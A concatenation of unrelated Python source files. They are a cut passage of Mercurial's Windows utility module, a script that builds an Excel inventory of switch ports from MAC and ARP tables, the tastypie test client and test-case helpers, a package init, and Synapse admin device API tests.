raise OSError(errno.EINVAL, 'Hardlinking not supported')
except pywintypes.error, details:
raise OSError(errno.EINVAL, 'target implements hardlinks improperly')
except NotImplementedError: # Another fake error win Win98
raise OSError(errno.EINVAL, 'Hardlinking not supported')
def _getfileinfo(pathname):
"""Return number of hardlinks for the given file."""
try:
fh = win32file.CreateFile(pathname,
win32file.GENERIC_READ, win32file.FILE_SHARE_READ,
None, win32file.OPEN_EXISTING, 0, None)
try:
return win32file.GetFileInformationByHandle(fh)
finally:
fh.Close()
except pywintypes.error:
return None
def nlinks(pathname):
"""Return number of hardlinks for the given file."""
res = _getfileinfo(pathname)
if res is not None:
return res[7]
else:
return os.lstat(pathname).st_nlink
def samefile(fpath1, fpath2):
"""Returns whether fpath1 and fpath2 refer to the same file. This is only
guaranteed to work for files, not directories."""
res1 = _getfileinfo(fpath1)
res2 = _getfileinfo(fpath2)
if res1 is not None and res2 is not None:
# Index 4 is the volume serial number, and 8 and 9 contain the file ID
return res1[4] == res2[4] and res1[8] == res2[8] and res1[9] == res2[9]
else:
return False
def samedevice(fpath1, fpath2):
"""Returns whether fpath1 and fpath2 are on the same device. This is only
guaranteed to work for files, not directories."""
res1 = _getfileinfo(fpath1)
res2 = _getfileinfo(fpath2)
if res1 is not None and res2 is not None:
return res1[4] == res2[4]
else:
return False
def testpid(pid):
'''return True if pid is still running or unable to
determine, False otherwise'''
try:
handle = win32api.OpenProcess(
win32con.PROCESS_QUERY_INFORMATION, False, pid)
if handle:
status = win32process.GetExitCodeProcess(handle)
return status == win32con.STILL_ACTIVE
except pywintypes.error, details:
return details[0] != winerror.ERROR_INVALID_PARAMETER
return True
def lookup_reg(key, valname=None, scope=None):
''' Look up a key/value name in the Windows registry.
valname: value name. If unspecified, the default value for the key
is used.
scope: optionally specify scope for registry lookup, this can be
a sequence of scopes to look up in order. Default (CURRENT_USER,
LOCAL_MACHINE).
'''
try:
from _winreg import HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, \
QueryValueEx, OpenKey
except ImportError:
return None
if scope is None:
scope = (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE)
elif not isinstance(scope, (list, tuple)):
scope = (scope,)
for s in scope:
try:
val = QueryValueEx(OpenKey(s, key), valname)[0]
# never let a Unicode string escape into the wild
return encoding.tolocal(val.encode('UTF-8'))
except EnvironmentError:
pass
def system_rcpath_win32():
'''return default os-specific hgrc search path'''
proc = win32api.GetCurrentProcess()
try:
# This will fail on windows < NT
filename = win32process.GetModuleFileNameEx(proc, 0)
except:
filename = win32api.GetModuleFileName(0)
# Use mercurial.ini found in directory with hg.exe
progrc = os.path.join(os.path.dirname(filename), 'mercurial.ini')
if os.path.isfile(progrc):
return [progrc]
# Use hgrc.d found in directory with hg.exe
progrcd = os.path.join(os.path.dirname(filename), 'hgrc.d')
if os.path.isdir(progrcd):
rcpath = []
for f, kind in osutil.listdir(progrcd):
if f.endswith('.rc'):
rcpath.append(os.path.join(progrcd, f))
return rcpath
# else look for a system rcpath in the registry
try:
value = win32api.RegQueryValue(
win32con.HKEY_LOCAL_MACHINE, 'SOFTWARE\\Mercurial')
rcpath = []
for p in value.split(os.pathsep):
if p.lower().endswith('mercurial.ini'):
rcpath.append(p)
elif os.path.isdir(p):
for f, kind in osutil.listdir(p):
if f.endswith('.rc'):
rcpath.append(os.path.join(p, f))
return rcpath
except pywintypes.error:
return []
def user_rcpath_win32():
'''return os-specific hgrc search path to the user dir'''
userdir = os.path.expanduser('~')
if sys.getwindowsversion()[3] != 2 and userdir == '~':
# We are on win < nt: fetch the APPDATA directory location and use
# the parent directory as the user home dir.
appdir = shell.SHGetPathFromIDList(
shell.SHGetSpecialFolderLocation(0, shellcon.CSIDL_APPDATA))
userdir = os.path.dirname(appdir)
return [os.path.join(userdir, 'mercurial.ini'),
os.path.join(userdir, '.hgrc')]
def getuser():
'''return name of current user'''
return win32api.GetUserName()
def set_signal_handler_win32():
"""Register a termination handler for console events including
CTRL+C. python signal handlers do not work well with socket
operations.
"""
def handler(event):
win32process.ExitProcess(1)
win32api.SetConsoleCtrlHandler(handler)
def hidewindow():
def callback(*args, **kwargs):
hwnd, pid = args
wpid = win32process.GetWindowThreadProcessId(hwnd)[1]
if pid == wpid:
win32gui.ShowWindow(hwnd, win32con.SW_HIDE)
pid = win32process.GetCurrentProcessId()
win32gui.EnumWindows(callback, pid)
|
#from excel_work import*
from common_functions import *
from pull import *
#from mac_and_arp_work import *
from napalm import get_network_driver
from getpass import getpass
from pprint import pprint
from name_work import *
import openpyxl
from openpyxl import Workbook
from openpyxl.compat import range
from openpyxl.utils import get_column_letter
def write_excel_data(row,column,value,sheet):
tmp = str(get_column_letter(column))+str(row)
sheet[tmp] = value
return column+1
username = input("Username: ")
password = getpass()
def normalize_mac (mac):
mac = mac.strip(" ")
mac = mac.replace('.','')
mac = mac.upper()
t = iter(mac)
mac = ':'.join(a+b for a,b in zip(t, t))
return mac
def pull_mac_table (netconnect):
mac_table_list = []
mac_table = net_connect.send_command_expect('sh mac address-table')
for line in mac_table.split('\n'):
mac_int = {}
line = line.lstrip(" ")
line = line.rstrip(" ")
if len(get_mac (line)) == 0:
continue
mac = normalize_mac (get_mac (line)[0])
if mac =='FF:FF:FF:FF:FF:FF':
continue
mac_int['mac']= mac
#print (line.split(" ")[-1])
interface = normalize_interface_names(line.split(" ")[-1])
mac_int['interface'] = interface
mac_table_list.append(mac_int)
return mac_table_list
def ouicorrect(list):
templist = []
for oui in list:
templist.append(oui[0:7])
return (templist)
def ouicorrect(list):
templist = []
for oui in list:
templist.append(normalize_mac (oui[0:7]))
return (templist)
def check_ouis(folder_name):
os.chdir(folder_name)
files = os.listdir()
#print (files)
OUIs = {}
for file in files:
q =open(file).readlines()
fixed_oui = ouicorrect (q)
for each_oui in fixed_oui:
OUIs [each_oui]= file
os.chdir(os.pardir)
return OUIs
def pull_oui_type(mac_address,OUIs):
mac_oui = mac_address[0:8]
if mac_oui in OUIs:
#print ("ITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKED")
return OUIs[mac_oui]
else:
#print (mac_oui)
return "Unknown"
driver = get_network_driver('ios')
to_check = read_doc ('pull_these.csv')
cdp_file_name= "temp_cdp_info.txt"
##device = driver("10.9.106.238", username,password)
#device.open()
#pprint(device.get_mac_address_table())
interfaces =[]
wb = openpyxl.Workbook()
folder_name = "OUIs"
OUIs = check_ouis(folder_name)
for device_and_arp in to_check:
print (device_and_arp)
# try:
interfaces = []
switch_to_check = device_and_arp.split(',')[0]
arp_device = device_and_arp.split(',')[1]
arp_device = arp_device.rstrip("\n")
print ("working on "+switch_to_check )
driver = get_network_driver('ios')
device = driver(arp_device, username,password)
device.open()
arp_table = device.get_arp_table()
net_connect = make_connection (switch_to_check,username,password)
mac_table = pull_mac_table (net_connect)
#pprint (mac_table )
#pprint(arp_table)
for mac_entry in mac_table:
for arp_entry in arp_table:
if mac_entry['mac'] == arp_entry['mac']:
tmp = {}
tmp['mac'] = mac_entry['mac']
tmp['interface'] = mac_entry['interface']
tmp['ip'] = arp_entry['ip']
tmp['type'] = pull_oui_type(tmp['mac'],OUIs)
try:
tmp['hostname'] = socket.gethostbyaddr(tmp['ip'])[0]
#print (tmp['hostname'])
except:
tmp['hostname'] = "Unknown"
interfaces.append(tmp)
#pprint (interfaces)
sheet = wb.create_sheet(switch_to_check)
row = 1
for interface in interfaces:
column = 1
if interface['interface'] == "Switch":
continue
column = write_excel_data(row,column,interface['interface'],sheet)
column = write_excel_data(row,column,interface['ip'],sheet)
column = write_excel_data(row,column,interface['type'],sheet)
column = write_excel_data(row,column,interface['hostname'],sheet)
column = write_excel_data(row,column,interface['mac'],sheet)
row = row+1
row = row+1
file_name = switch_to_check+ " show cdp"
pull_cdp_output(switch_to_check,username,password,file_name)
#cdp_info = cdp_info.split('\n')
for each in parse_cdp_out(file_name):
column = 1
column = write_excel_data(row,column,each['remote_id'],sheet)
column = write_excel_data(row,column,each['remote_ip'],sheet)
column = write_excel_data(row,column,each['local_int'],sheet)
column = write_excel_data(row,column,each['remote_int'],sheet)
column = write_excel_data(row,column,each['platform'],sheet)
row = row+1
# except:
# print(switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work")
wb.save('output.xlsx')
|
from __future__ import unicode_literals
import time
from django.conf import settings
from django.test import TestCase
from django.test.client import FakePayload, Client
from django.utils.encoding import force_text
from tastypie.serializers import Serializer
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
class TestApiClient(object):
def __init__(self, serializer=None):
"""
Sets up a fresh ``TestApiClient`` instance.
If you are employing a custom serializer, you can pass the class to the
``serializer=`` kwarg.
"""
self.client = Client()
self.serializer = serializer
if not self.serializer:
self.serializer = Serializer()
def get_content_type(self, short_format):
"""
Given a short name (such as ``json`` or ``xml``), returns the full content-type
for it (``application/json`` or ``application/xml`` in this case).
"""
return self.serializer.content_types.get(short_format, 'json')
def get(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``GET`` request to the provided URI.
Optionally accepts a ``data`` kwarg, which in the case of ``GET``, lets you
send along ``GET`` parameters. This is useful when testing filtering or other
things that read off the ``GET`` params. Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.get('/api/v1/entry/1/', data={'format': 'json', 'title__startswith': 'a', 'limit': 20, 'offset': 60})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['HTTP_ACCEPT'] = content_type
# GET & DELETE are the only times we don't serialize the data.
if data is not None:
kwargs['data'] = data
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.get(uri, **kwargs)
def post(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``POST`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``POST`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.post('/api/v1/entry/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.post(uri, **kwargs)
def put(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``PUT`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PUT`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.put('/api/v1/entry/1/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.put(uri, **kwargs)
def patch(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``PATCH`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PATCH`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.patch('/api/v1/entry/1/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
# This hurts because Django doesn't support PATCH natively.
parsed = urlparse(uri)
r = {
'CONTENT_LENGTH': len(kwargs['data']),
'CONTENT_TYPE': content_type,
'PATH_INFO': self.client._get_path(parsed),
'QUERY_STRING': parsed[4],
'REQUEST_METHOD': 'PATCH',
'wsgi.input': FakePayload(kwargs['data']),
}
r.update(kwargs)
return self.client.request(**r)
def delete(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``DELETE`` request to the provided URI.
Optionally accepts a ``data`` kwarg, which in the case of ``DELETE``, lets you
send along ``DELETE`` parameters. This is useful when testing filtering or other
things that read off the ``DELETE`` params. Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.delete('/api/v1/entry/1/', data={'format': 'json'})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
# GET & DELETE are the only times we don't serialize the data.
if data is not None:
kwargs['data'] = data
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.delete(uri, **kwargs)
class ResourceTestCase(TestCase):
"""
A useful base class for the start of testing Tastypie APIs.
"""
def setUp(self):
super(ResourceTestCase, self).setUp()
self.serializer = Serializer()
self.api_client = TestApiClient()
def get_credentials(self):
"""
A convenience method for the user as a way to shorten up the
often repetitious calls to create the same authentication.
Raises ``NotImplementedError`` by default.
Usage::
class MyResourceTestCase(ResourceTestCase):
def get_credentials(self):
return self.create_basic('daniel', 'pass')
# Then the usual tests...
"""
raise NotImplementedError("You must return the class for your Resource to test.")
def create_basic(self, username, password):
"""
Creates & returns the HTTP ``Authorization`` header for use with BASIC
Auth.
"""
import base64
return 'Basic %s' % base64.b64encode(':'.join([username, password]).encode('utf-8')).decode('utf-8')
def create_apikey(self, username, api_key):
"""
Creates & returns the HTTP ``Authorization`` header for use with
``ApiKeyAuthentication``.
"""
return 'ApiKey %s:%s' % (username, api_key)
def create_digest(self, username, api_key, method, uri):
"""
Creates & returns the HTTP ``Authorization`` header for use with Digest
Auth.
"""
from tastypie.authentication import hmac, sha1, uuid, python_digest
new_uuid = uuid.uuid4()
opaque = hmac.new(str(new_uuid).encode('utf-8'), digestmod=sha1).hexdigest().decode('utf-8')
return python_digest.build_authorization_request(
username,
method.upper(),
uri,
1, # nonce_count
digest_challenge=python_digest.build_digest_challenge(time.time(), getattr(settings, 'SECRET_KEY', ''), 'django-tastypie', opaque, False),
password=api_key
)
def create_oauth(self, user):
"""
Creates & returns the HTTP ``Authorization`` header for use with Oauth.
"""
from oauth_provider.models import Consumer, Token, Resource
# Necessary setup for ``oauth_provider``.
resource, _ = Resource.objects.get_or_create(url='test', defaults={
'name': 'Test Resource'
})
consumer, _ = Consumer.objects.get_or_create(key='123', defaults={
'name': 'Test',
'description': 'Testing...'
})
token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={
'consumer': consumer,
'resource': resource,
'secret': '',
'user': user,
})
# Then generate the header.
oauth_data = {
'oauth_consumer_key': '123',
'oauth_nonce': 'abc',
'oauth_signature': '&',
'oauth_signature_method': 'PLAINTEXT',
'oauth_timestamp': str(int(time.time())),
'oauth_token': 'foo',
}
return 'OAuth %s' % ','.join([key+'='+value for key, value in oauth_data.items()])
def assertHttpOK(self, resp):
"""
Ensures the response is returning a HTTP 200.
"""
return self.assertEqual(resp.status_code, 200)
def assertHttpCreated(self, resp):
"""
Ensures the response is returning a HTTP 201.
"""
return self.assertEqual(resp.status_code, 201)
def assertHttpAccepted(self, resp):
"""
Ensures the response is returning either a HTTP 202 or a HTTP 204.
"""
self.assertIn(resp.status_code, [202, 204])
self.assertNotIn('Content-Type', resp)
def assertHttpMultipleChoices(self, resp):
"""
Ensures the response is returning a HTTP 300.
"""
return self.assertEqual(resp.status_code, 300)
def assertHttpSeeOther(self, resp):
"""
Ensures the response is returning a HTTP 303.
"""
return self.assertEqual(resp.status_code, 303)
def assertHttpNotModified(self, resp):
"""
Ensures the response is returning a HTTP 304.
"""
return self.assertEqual(resp.status_code, 304)
def assertHttpBadRequest(self, resp):
"""
Ensures the response is returning a HTTP 400.
"""
return self.assertEqual(resp.status_code, 400)
def assertHttpUnauthorized(self, resp):
"""
Ensures the response is returning a HTTP 401.
"""
return self.assertEqual(resp.status_code, 401)
def assertHttpForbidden(self, resp):
"""
Ensures the response is returning a HTTP 403.
"""
return self.assertEqual(resp.status_code, 403)
def assertHttpNotFound(self, resp):
"""
Ensures the response is returning a HTTP 404.
"""
return self.assertEqual(resp.status_code, 404)
def assertHttpMethodNotAllowed(self, resp):
"""
Ensures the response is returning a HTTP 405.
"""
return self.assertEqual(resp.status_code, 405)
def assertHttpConflict(self, resp):
"""
Ensures the response is returning a HTTP 409.
"""
return self.assertEqual(resp.status_code, 409)
def assertHttpGone(self, resp):
"""
Ensures the response is returning a HTTP 410.
"""
return self.assertEqual(resp.status_code, 410)
def assertHttpUnprocessableEntity(self, resp):
"""
Ensures the response is returning a HTTP 422.
"""
return self.assertEqual(resp.status_code, 422)
def assertHttpTooManyRequests(self, resp):
"""
Ensures the response is returning a HTTP 429.
"""
return self.assertEqual(resp.status_code, 429)
def assertHttpApplicationError(self, resp):
"""
Ensures the response is returning a HTTP 500.
"""
return self.assertEqual(resp.status_code, 500)
def assertHttpNotImplemented(self, resp):
"""
Ensures the response is returning a HTTP 501.
"""
return self.assertEqual(resp.status_code, 501)
def assertValidJSON(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid JSON &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_json(data)
def assertValidXML(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid XML &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_xml(data)
def assertValidYAML(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid YAML &
can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_yaml(data)
def assertValidPlist(self, data):
"""
Given the provided ``data`` as a string, ensures that it is valid
binary plist & can be loaded properly.
"""
# Just try the load. If it throws an exception, the test case will fail.
self.serializer.from_plist(data)
def assertValidJSONResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/json``)
* The content is valid JSON
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/json'))
self.assertValidJSON(force_text(resp.content))
def assertValidXMLResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/xml``)
* The content is valid XML
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/xml'))
self.assertValidXML(force_text(resp.content))
def assertValidYAMLResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``text/yaml``)
* The content is valid YAML
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('text/yaml'))
self.assertValidYAML(force_text(resp.content))
def assertValidPlistResponse(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, assert that
you get back:
* An HTTP 200
* The correct content-type (``application/x-plist``)
* The content is valid binary plist data
"""
self.assertHttpOK(resp)
self.assertTrue(resp['Content-Type'].startswith('application/x-plist'))
self.assertValidPlist(force_text(resp.content))
def deserialize(self, resp):
"""
Given a ``HttpResponse`` coming back from using the ``client``, this method
checks the ``Content-Type`` header & attempts to deserialize the data based on
that.
It returns a Python datastructure (typically a ``dict``) of the serialized data.
"""
return self.serializer.deserialize(resp.content, format=resp['Content-Type'])
def serialize(self, data, format='application/json'):
"""
Given a Python datastructure (typically a ``dict``) & a desired content-type,
this method will return a serialized string of that data.
"""
return self.serializer.serialize(data, format=format)
def assertKeys(self, data, expected):
"""
This method ensures that the keys of the ``data`` match up to the keys of
``expected``.
It covers the (extremely) common case where you want to make sure the keys of
a response match up to what is expected. This is typically less fragile than
testing the full structure, which can be prone to data changes.
"""
self.assertEqual(sorted(data.keys()), sorted(expected))
|
__all__ = ['MqttCommManager']
from .mqtt_comm_manager import MqttCommManager
|
# Copyright 2020 Dirk Klimpel
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.parse
from http import HTTPStatus
from parameterized import parameterized
from twisted.test.proto_helpers import MemoryReactor
import synapse.rest.admin
from synapse.api.errors import Codes
from synapse.rest.client import login
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
class DeviceRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.handler = hs.get_device_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.other_user_token = self.login("user", "pass")
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.other_user_device_id = res[0]["device_id"]
self.url = "/_synapse/admin/v2/users/%s/devices/%s" % (
urllib.parse.quote(self.other_user),
self.other_user_device_id,
)
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_no_auth(self, method: str) -> None:
"""
Try to get a device of an user without authentication.
"""
channel = self.make_request(method, self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_requester_is_no_admin(self, method: str) -> None:
"""
If the user is not a server admin, an error is returned.
"""
channel = self.make_request(
method,
self.url,
access_token=self.other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_user_does_not_exist(self, method: str) -> None:
"""
Tests that a lookup for a user that does not exist returns a HTTPStatus.NOT_FOUND
"""
url = (
"/_synapse/admin/v2/users/@unknown_person:test/devices/%s"
% self.other_user_device_id
)
channel = self.make_request(
method,
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
@parameterized.expand(["GET", "PUT", "DELETE"])
def test_user_is_not_local(self, method: str) -> None:
"""
Tests that a lookup for a user that is not a local returns a HTTPStatus.BAD_REQUEST
"""
url = (
"/_synapse/admin/v2/users/@unknown_person:unknown_domain/devices/%s"
% self.other_user_device_id
)
channel = self.make_request(
method,
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_unknown_device(self) -> None:
"""
Tests that a lookup for a device that does not exist returns either HTTPStatus.NOT_FOUND or HTTPStatus.OK.
"""
url = "/_synapse/admin/v2/users/%s/devices/unknown_device" % urllib.parse.quote(
self.other_user
)
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
channel = self.make_request(
"DELETE",
url,
access_token=self.admin_user_tok,
)
# Delete unknown device returns status HTTPStatus.OK
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
def test_update_device_too_long_display_name(self) -> None:
"""
Update a device with a display name that is invalid (too long).
"""
# Set iniital display name.
update = {"display_name": "new display"}
self.get_success(
self.handler.update_device(
self.other_user, self.other_user_device_id, update
)
)
# Request to update a device display name with a new value that is longer than allowed.
update = {
"display_name": "a"
* (synapse.handlers.device.MAX_DEVICE_DISPLAY_NAME_LEN + 1)
}
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
content=update,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual(Codes.TOO_LARGE, channel.json_body["errcode"])
# Ensure the display name was not updated.
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new display", channel.json_body["display_name"])
def test_update_no_display_name(self) -> None:
"""
Tests that a update for a device without JSON returns a HTTPStatus.OK
"""
# Set iniital display name.
update = {"display_name": "new display"}
self.get_success(
self.handler.update_device(
self.other_user, self.other_user_device_id, update
)
)
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Ensure the display name was not updated.
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new display", channel.json_body["display_name"])
def test_update_display_name(self) -> None:
"""
Tests a normal successful update of display name
"""
# Set new display_name
channel = self.make_request(
"PUT",
self.url,
access_token=self.admin_user_tok,
content={"display_name": "new displayname"},
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Check new display_name
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual("new displayname", channel.json_body["display_name"])
def test_get_device(self) -> None:
"""
Tests that a normal lookup for a device is successfully
"""
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
# Check that all fields are available
self.assertIn("user_id", channel.json_body)
self.assertIn("device_id", channel.json_body)
self.assertIn("display_name", channel.json_body)
self.assertIn("last_seen_ip", channel.json_body)
self.assertIn("last_seen_ts", channel.json_body)
def test_delete_device(self) -> None:
"""
Tests that a remove of a device is successfully
"""
# Count number of devies of an user.
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
number_devices = len(res)
self.assertEqual(1, number_devices)
# Delete device
channel = self.make_request(
"DELETE",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
# Ensure that the number of devices is decreased
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(number_devices - 1, len(res))
class DevicesRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v2/users/%s/devices" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self) -> None:
"""
Try to list devices of an user without authentication.
"""
channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self) -> None:
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
channel = self.make_request(
"GET",
self.url,
access_token=other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self) -> None:
"""
Tests that a lookup for a user that does not exist returns a HTTPStatus.NOT_FOUND
"""
url = "/_synapse/admin/v2/users/@unknown_person:test/devices"
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self) -> None:
"""
Tests that a lookup for a user that is not a local returns a HTTPStatus.BAD_REQUEST
"""
url = "/_synapse/admin/v2/users/@unknown_person:unknown_domain/devices"
channel = self.make_request(
"GET",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_user_has_no_devices(self) -> None:
"""
Tests that a normal lookup for devices is successfully
if user has no devices
"""
# Get devices
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
